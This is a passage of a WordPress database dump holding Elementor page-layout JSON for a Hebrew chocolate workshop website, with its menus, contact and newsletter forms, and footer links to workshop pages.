\\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1533,318,'_elementor_version','0.4'),(1534,318,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(1535,319,'_elementor_template_type','page'),(1536,319,'_elementor_edit_mode','builder'),(1537,319,'_wp_page_template','default'),(1538,319,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779\",\"webhooks_advanced_data\":\"\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1539,319,'_elementor_version','0.4'),(1540,319,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(1541,320,'_elementor_template_type','page'),(1542,320,'_elementor_edit_mode','builder'),(1543,320,'_wp_page_template','default'),(1544,320,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 